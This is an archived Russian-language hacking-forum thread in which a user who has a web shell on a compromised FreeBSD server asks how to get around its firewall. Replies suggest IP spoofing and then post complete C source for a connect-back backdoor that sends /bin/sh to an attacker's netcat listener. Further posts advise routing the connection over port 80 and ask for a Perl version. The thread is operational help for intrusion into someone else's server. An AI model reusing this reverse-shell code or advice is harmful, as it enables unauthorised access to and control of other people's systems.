ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Обойти фаерволл в FreeBSD |

23.12.2005, 14:00
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме: 47924
Репутация:
0
|
|
Обойти фаерволл в FreeBSD
Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
|
|
|

23.12.2005, 16:03
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме: 2487541
Репутация:
761
|
|
Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо).
:]
|
|
|

23.12.2005, 18:26
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
scorpion, юзай Connect-Back Backdoor.
bdw.c
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 4000;
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(connect(fd, (struct sockaddr*)&addr, sizeof(addr))<0)printf("fucker!\n");
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
close(fd);
return 1;
}
Есть еще пару способов, но этот самый простой...
|
|
|

23.12.2005, 18:31
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме: 2487541
Репутация:
761
|
|
Что-то я стормозил... Дейсвительно, так проще. :]
|
|
|

24.12.2005, 00:09
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме: 47924
Репутация:
0
|
|
Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации  )))
|
|
|

24.12.2005, 00:26
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме: 47924
Репутация:
0
|
|
VIRGOZ
Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я???
|
|
|

24.12.2005, 01:48
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
|
|
|

26.12.2005, 15:02
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме: 7298807
Репутация:
901
|
|
Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит..
|
|
|

29.12.2005, 01:26
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме: 47924
Репутация:
0
|
|
Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???
Где взять такой перл шелл???
P.S За хорошую помощь поднимаю репутацию всегда...
|
|
|

29.12.2005, 03:10
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме: 2487541
Репутация:
761
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|